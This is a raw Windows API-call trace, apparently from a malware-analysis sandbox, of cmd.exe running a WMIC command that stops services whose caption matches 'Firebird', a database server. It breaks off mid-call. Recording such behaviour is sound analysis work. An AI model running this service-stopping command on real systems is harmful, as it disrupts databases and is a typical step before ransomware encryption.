[0096.082] SetConsoleMode (hConsoleHandle=0x38, dwMode=0x1e7) returned 1 [0096.082] GetEnvironmentStringsW () returned 0x52d7de0* [0096.082] FreeEnvironmentStringsA (penv="A") returned 1 [0096.082] GetEnvironmentStringsW () returned 0x52d7de0* [0096.082] FreeEnvironmentStringsA (penv="A") returned 1 [0096.082] RegOpenKeyExW (in: hKey=0x80000002, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f2ea54 | out: phkResult=0x4f2ea54*=0x94) returned 0x0 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x30, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x1, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x1, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x0, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x40, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.082] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x40, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x40, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.083] RegCloseKey (hKey=0x94) returned 0x0 [0096.083] RegOpenKeyExW (in: hKey=0x80000001, lpSubKey="Software\\Microsoft\\Command Processor", ulOptions=0x0, samDesired=0x2000000, phkResult=0x4f2ea54 | out: phkResult=0x4f2ea54*=0x94) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DisableUNCCheck", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x40, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="EnableExtensions", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x1, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DelayedExpansion", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x1, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="DefaultColor", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x0, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="CompletionChar", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x9, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="PathCompletionChar", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x4, lpData=0x4f2ea60*=0x9, lpcbData=0x4f2ea5c*=0x4) returned 0x0 [0096.083] RegQueryValueExW (in: hKey=0x94, lpValueName="AutoRun", lpReserved=0x0, lpType=0x4f2ea58, lpData=0x4f2ea60, lpcbData=0x4f2ea5c*=0x1000 | out: lpType=0x4f2ea58*=0x0, lpData=0x4f2ea60*=0x9, lpcbData=0x4f2ea5c*=0x1000) returned 0x2 [0096.083] RegCloseKey (hKey=0x94) returned 0x0 [0096.083] time (in: timer=0x0 | out: timer=0x0) returned 0x5ad29810 [0096.083] srand (_Seed=0x5ad29810) [0096.083] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE" [0096.083] GetCommandLineW () returned="/c WMIC SERVICE WHERE 'caption LIKE '%Firebird%'' CALL STOPSERVICE" [0096.083] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0096.083] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x52d9d38, nSize=0x104 | out: lpFilename="C:\\Windows\\SysWOW64\\cmd.exe" (normalized: "c:\\windows\\syswow64\\cmd.exe")) returned 0x1b [0096.083] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0096.083] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.083] GetEnvironmentVariableW (in: lpName="PROMPT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.084] _wcsicmp (_String1="PROMPT", _String2="CD") returned 13 [0096.084] _wcsicmp (_String1="PROMPT", _String2="ERRORLEVEL") returned 11 [0096.084] _wcsicmp (_String1="PROMPT", _String2="CMDEXTVERSION") returned 13 [0096.084] _wcsicmp (_String1="PROMPT", _String2="CMDCMDLINE") returned 13 [0096.084] _wcsicmp (_String1="PROMPT", _String2="DATE") returned 12 [0096.084] _wcsicmp (_String1="PROMPT", _String2="TIME") returned -4 [0096.084] _wcsicmp (_String1="PROMPT", _String2="RANDOM") returned -2 [0096.084] _wcsicmp (_String1="PROMPT", _String2="HIGHESTNUMANODENUMBER") returned 8 [0096.084] SetEnvironmentVariableW (lpName="PROMPT", lpValue="$P$G") returned 1 [0096.084] GetEnvironmentStringsW () returned 0x52d7de0* [0096.084] FreeEnvironmentStringsA (penv="A") returned 1 [0096.084] GetEnvironmentVariableW (in: lpName="COMSPEC", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.084] GetEnvironmentVariableW (in: lpName="KEYS", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.084] _wcsicmp (_String1="KEYS", _String2="CD") returned 8 [0096.084] _wcsicmp (_String1="KEYS", _String2="ERRORLEVEL") returned 6 [0096.084] _wcsicmp (_String1="KEYS", _String2="CMDEXTVERSION") returned 8 [0096.084] _wcsicmp (_String1="KEYS", _String2="CMDCMDLINE") returned 8 [0096.084] _wcsicmp (_String1="KEYS", _String2="DATE") returned 7 [0096.084] _wcsicmp (_String1="KEYS", _String2="TIME") returned -9 [0096.084] _wcsicmp (_String1="KEYS", _String2="RANDOM") returned -7 [0096.084] _wcsicmp (_String1="KEYS", _String2="HIGHESTNUMANODENUMBER") returned 3 [0096.085] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x4f2f82c | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0096.085] GetFullPathNameW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", nBufferLength=0x104, lpBuffer=0x4f2f82c, lpFilePart=0x4f2f824 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f2f824*="Desktop") returned 0x1d [0096.085] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0096.085] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0x4f2f5a8 | out: lpFindFileData=0x4f2f5a8) returned 0x52d05c8 [0096.085] FindClose (in: hFindFile=0x52d05c8 | out: hFindFile=0x52d05c8) returned 1 [0096.085] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps", lpFindFileData=0x4f2f5a8 | out: lpFindFileData=0x4f2f5a8) returned 0x52d05c8 [0096.085] FindClose (in: hFindFile=0x52d05c8 | out: hFindFile=0x52d05c8) returned 1 [0096.085] _wcsnicmp (_String1="CIIHMN~1", _String2="CIiHmnxMn6Ps", _MaxCount=0xc) returned 6 [0096.085] FindFirstFileW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFindFileData=0x4f2f5a8 | out: lpFindFileData=0x4f2f5a8) returned 0x52d05c8 [0096.085] FindClose (in: hFindFile=0x52d05c8 | out: hFindFile=0x52d05c8) returned 1 [0096.085] GetFileAttributesW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 0x11 [0096.086] SetCurrentDirectoryW (lpPathName="C:\\Users\\CIiHmnxMn6Ps\\Desktop" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop")) returned 1 [0096.086] SetEnvironmentVariableW (lpName="=C:", lpValue="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 1 [0096.086] GetEnvironmentStringsW () returned 0x52d7de0* [0096.086] FreeEnvironmentStringsA (penv="=") returned 1 [0096.086] GetCurrentDirectoryW (in: nBufferLength=0x104, lpBuffer=0x3f6720 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop") returned 0x1d [0096.086] GetConsoleOutputCP () returned 0x1b5 [0096.086] GetCPInfo (in: CodePage=0x1b5, lpCPInfo=0x3ee460 | out: lpCPInfo=0x3ee460) returned 1 [0096.086] GetUserDefaultLCID () returned 0x409 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1e, lpLCData=0x3f24a0, cchData=8 | out: lpLCData=":") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x23, lpLCData=0x4f2f95c, cchData=128 | out: lpLCData="0") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x21, lpLCData=0x4f2f95c, cchData=128 | out: lpLCData="0") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x24, lpLCData=0x4f2f95c, cchData=128 | out: lpLCData="1") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x1d, lpLCData=0x3f24b0, cchData=8 | out: lpLCData="/") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x31, lpLCData=0x3f2500, cchData=32 | out: lpLCData="Mon") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x32, lpLCData=0x3f2540, cchData=32 | out: lpLCData="Tue") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x33, lpLCData=0x3f2580, cchData=32 | out: lpLCData="Wed") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x34, lpLCData=0x3f25c0, cchData=32 | out: lpLCData="Thu") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x35, lpLCData=0x3f2600, cchData=32 | out: lpLCData="Fri") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x36, lpLCData=0x3f2640, cchData=32 | out: lpLCData="Sat") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0x37, lpLCData=0x3f2680, cchData=32 | out: lpLCData="Sun") returned 4 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0xe, lpLCData=0x3f24c0, cchData=8 | out: lpLCData=".") returned 2 [0096.087] GetLocaleInfoW (in: Locale=0x409, LCType=0xf, lpLCData=0x3f24e0, cchData=8 | out: lpLCData=",") returned 2 [0096.087] setlocale (category=0, locale=".OCP") returned="English_United States.437" [0096.088] GetConsoleTitleW (in: lpConsoleTitle=0x52daab0, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.088] GetModuleHandleW (lpModuleName="KERNEL32.DLL") returned 0x77670000 [0096.088] GetProcAddress (hModule=0x77670000, lpProcName="CopyFileExW") returned 0x7768fa80 [0096.088] GetProcAddress (hModule=0x77670000, lpProcName="IsDebuggerPresent") returned 0x7768a790 [0096.088] GetProcAddress (hModule=0x77670000, lpProcName="SetConsoleInputExeNameW") returned 0x76a835c0 [0096.088] GetEnvironmentVariableW (in: lpName="Firebird", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="") returned 0x0 [0096.088] _wcsicmp (_String1="Firebird", _String2="CD") returned 3 [0096.088] _wcsicmp (_String1="Firebird", _String2="ERRORLEVEL") returned 1 [0096.088] _wcsicmp (_String1="Firebird", _String2="CMDEXTVERSION") returned 3 [0096.088] _wcsicmp (_String1="Firebird", _String2="CMDCMDLINE") returned 3 [0096.088] _wcsicmp (_String1="Firebird", _String2="DATE") returned 2 [0096.088] _wcsicmp (_String1="Firebird", _String2="TIME") returned -14 [0096.088] _wcsicmp (_String1="Firebird", _String2="RANDOM") returned -12 [0096.088] _wcsicmp (_String1="Firebird", _String2="HIGHESTNUMANODENUMBER") returned -2 [0096.089] _wcsicmp (_String1="WMIC", _String2=")") returned 78 [0096.089] _wcsicmp (_String1="FOR", _String2="WMIC") returned -17 [0096.089] _wcsicmp (_String1="FOR/?", _String2="WMIC") returned -17 [0096.089] _wcsicmp (_String1="IF", _String2="WMIC") returned -14 [0096.089] _wcsicmp (_String1="IF/?", _String2="WMIC") returned -14 [0096.089] _wcsicmp (_String1="REM", _String2="WMIC") returned -5 [0096.089] _wcsicmp (_String1="REM/?", _String2="WMIC") returned -5 [0096.090] GetConsoleTitleW (in: lpConsoleTitle=0x4f2f648, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.090] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0096.091] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0096.091] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0096.091] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0096.091] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0096.091] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0096.091] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0096.091] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0096.091] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0096.091] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0096.091] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0096.091] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0096.091] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0096.091] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0096.091] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0096.091] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0096.091] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0096.091] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0096.091] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0096.091] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0096.091] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0096.091] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0096.091] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0096.091] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0096.091] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0096.091] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0096.091] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0096.091] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0096.091] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0096.091] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0096.091] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0096.091] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0096.091] _wcsicmp (_String1="WMIC", _String2="DIR") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="ERASE") returned 18 [0096.091] _wcsicmp (_String1="WMIC", _String2="DEL") returned 19 [0096.091] _wcsicmp (_String1="WMIC", _String2="TYPE") returned 3 [0096.091] _wcsicmp (_String1="WMIC", _String2="COPY") returned 20 [0096.091] _wcsicmp (_String1="WMIC", _String2="CD") returned 20 [0096.092] _wcsicmp (_String1="WMIC", _String2="CHDIR") returned 20 [0096.092] _wcsicmp (_String1="WMIC", _String2="RENAME") returned 5 [0096.092] _wcsicmp (_String1="WMIC", _String2="REN") returned 5 [0096.092] _wcsicmp (_String1="WMIC", _String2="ECHO") returned 18 [0096.092] _wcsicmp (_String1="WMIC", _String2="SET") returned 4 [0096.092] _wcsicmp (_String1="WMIC", _String2="PAUSE") returned 7 [0096.092] _wcsicmp (_String1="WMIC", _String2="DATE") returned 19 [0096.092] _wcsicmp (_String1="WMIC", _String2="TIME") returned 3 [0096.092] _wcsicmp (_String1="WMIC", _String2="PROMPT") returned 7 [0096.092] _wcsicmp (_String1="WMIC", _String2="MD") returned 10 [0096.092] _wcsicmp (_String1="WMIC", _String2="MKDIR") returned 10 [0096.092] _wcsicmp (_String1="WMIC", _String2="RD") returned 5 [0096.092] _wcsicmp (_String1="WMIC", _String2="RMDIR") returned 5 [0096.092] _wcsicmp (_String1="WMIC", _String2="PATH") returned 7 [0096.092] _wcsicmp (_String1="WMIC", _String2="GOTO") returned 16 [0096.092] _wcsicmp (_String1="WMIC", _String2="SHIFT") returned 4 [0096.092] _wcsicmp (_String1="WMIC", _String2="CLS") returned 20 [0096.092] _wcsicmp (_String1="WMIC", _String2="CALL") returned 20 [0096.092] _wcsicmp (_String1="WMIC", _String2="VERIFY") returned 1 [0096.092] _wcsicmp (_String1="WMIC", _String2="VER") returned 1 [0096.092] _wcsicmp (_String1="WMIC", _String2="VOL") returned 1 [0096.092] _wcsicmp (_String1="WMIC", _String2="EXIT") returned 18 [0096.092] _wcsicmp (_String1="WMIC", _String2="SETLOCAL") returned 4 [0096.092] _wcsicmp (_String1="WMIC", _String2="ENDLOCAL") returned 18 [0096.092] _wcsicmp (_String1="WMIC", _String2="TITLE") returned 3 [0096.092] _wcsicmp (_String1="WMIC", _String2="START") returned 4 [0096.092] _wcsicmp (_String1="WMIC", _String2="DPATH") returned 19 [0096.092] _wcsicmp (_String1="WMIC", _String2="KEYS") returned 12 [0096.092] _wcsicmp (_String1="WMIC", _String2="MOVE") returned 10 [0096.092] _wcsicmp (_String1="WMIC", _String2="PUSHD") returned 7 [0096.092] _wcsicmp (_String1="WMIC", _String2="POPD") returned 7 [0096.092] _wcsicmp (_String1="WMIC", _String2="ASSOC") returned 22 [0096.092] _wcsicmp (_String1="WMIC", _String2="FTYPE") returned 17 [0096.092] _wcsicmp (_String1="WMIC", _String2="BREAK") returned 21 [0096.092] _wcsicmp (_String1="WMIC", _String2="COLOR") returned 20 [0096.092] _wcsicmp (_String1="WMIC", _String2="MKLINK") returned 10 [0096.092] _wcsicmp (_String1="WMIC", _String2="FOR") returned 17 [0096.092] _wcsicmp (_String1="WMIC", _String2="IF") returned 14 [0096.092] _wcsicmp (_String1="WMIC", _String2="REM") returned 5 [0096.093] _wcsnicmp (_String1="WMIC", _String2="cmd ", _MaxCount=0x4) returned 20 [0096.093] SetErrorMode (uMode=0x0) returned 0x0 [0096.093] SetErrorMode (uMode=0x1) returned 0x0 [0096.093] GetFullPathNameW (in: lpFileName=".", nBufferLength=0x208, lpBuffer=0x52d05d0, lpFilePart=0x4f2f154 | out: lpBuffer="C:\\Users\\CIiHmnxMn6Ps\\Desktop", lpFilePart=0x4f2f154*="Desktop") returned 0x1d [0096.093] SetErrorMode (uMode=0x0) returned 0x1 [0096.093] GetEnvironmentVariableW (in: lpName="PATH", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer="C:\\ProgramData\\Oracle\\Java\\javapath;C:\\Windows\\system32;C:\\Windows;C:\\Windows\\System32\\Wbem;C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\") returned 0x87 [0096.093] NeedCurrentDirectoryForExePathW (ExeName=".") returned 1 [0096.098] GetEnvironmentVariableW (in: lpName="PATHEXT", lpBuffer=0x3ee4a0, nSize=0x2000 | out: lpBuffer=".COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC") returned 0x35 [0096.099] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.100] FindFirstFileExW (in: lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0xffffffff [0096.100] GetLastError () returned 0x2 [0096.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.100] FindFirstFileExW (in: lpFileName="C:\\ProgramData\\Oracle\\Java\\javapath\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0xffffffff [0096.100] GetLastError () returned 0x2 [0096.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\system32\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0xffffffff [0096.100] GetLastError () returned 0x2 [0096.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.100] FindFirstFileExW (in: lpFileName="C:\\Windows\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0xffffffff [0096.100] GetLastError () returned 0x2 [0096.100] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0096.101] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.*", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0x52db240 [0096.122] FindClose (in: hFindFile=0x52db240 | out: hFindFile=0x52db240) returned 1 [0096.123] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.COM", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0xffffffff [0096.124] GetLastError () returned 0x2 [0096.124] FindFirstFileExW (in: lpFileName="C:\\Windows\\System32\\Wbem\\WMIC.EXE", fInfoLevelId=0x1, lpFindFileData=0x4f2eee0, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x4f2eee0) returned 0x52db240 [0096.125] FindClose (in: hFindFile=0x52db240 | out: hFindFile=0x52db240) returned 1 [0096.125] _wcsicmp (_String1=".EXE", _String2=".BAT") returned 3 [0096.125] _wcsicmp (_String1=".EXE", _String2=".CMD") returned 2 [0096.125] GetConsoleTitleW (in: lpConsoleTitle=0x4f2f3d4, nSize=0x104 | out: lpConsoleTitle="C:\\Windows\\system32\\cmd.exe") returned 0x1b [0096.126] InitializeProcThreadAttributeList (in: lpAttributeList=0x4f2f300, dwAttributeCount=0x1, dwFlags=0x0, lpSize=0x4f2f2e4 | out: lpAttributeList=0x4f2f300, lpSize=0x4f2f2e4) returned 1 [0096.126] UpdateProcThreadAttribute (in: lpAttributeList=0x4f2f300, dwFlags=0x0, Attribute=0x60001, lpValue=0x4f2f2ec, cbSize=0x4, lpPreviousValue=0x0, lpReturnSize=0x0 | out: lpAttributeList=0x4f2f300, lpPreviousValue=0x0) returned 1 [0096.126] GetStartupInfoW (in: lpStartupInfo=0x4f2f338 | out: lpStartupInfo=0x4f2f338*(cb=0x44, lpReserved="", lpDesktop="WinSta0\\Default", lpTitle="C:\\Windows\\system32\\cmd.exe", dwX=0x0, dwY=0x0, dwXSize=0x0, dwYSize=0x0, dwXCountChars=0x0, dwYCountChars=0x0, dwFillAttribute=0x0, dwFlags=0x0, wShowWindow=0x0, cbReserved2=0x0, lpReserved2=0x0, hStdInput=0x0, hStdOutput=0x0, hStdError=0x0)) [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="=C:=C:\\", _MaxCount=0x7) returned 38 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="ALLUSER", _MaxCount=0x7) returned 2 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="APPDATA", _MaxCount=0x7) returned 2 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="CommonP", _MaxCount=0x7) returned 3 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="COMPUTE", _MaxCount=0x7) returned 3 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="ComSpec", _MaxCount=0x7) returned 3 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEDRI", _MaxCount=0x7) returned -5 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="HOMEPAT", _MaxCount=0x7) returned -5 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="LOCALAP", _MaxCount=0x7) returned -9 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="LOGONSE", _MaxCount=0x7) returned -9 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="NUMBER_", _MaxCount=0x7) returned -11 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="OneDriv", _MaxCount=0x7) returned -12 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="OS=Wind", _MaxCount=0x7) returned -12 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="Path=C:", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PATHEXT", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="PROCESS", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp (_String1="COPYCMD", _String2="Program", _MaxCount=0x7) returned -13 [0096.126] _wcsnicmp 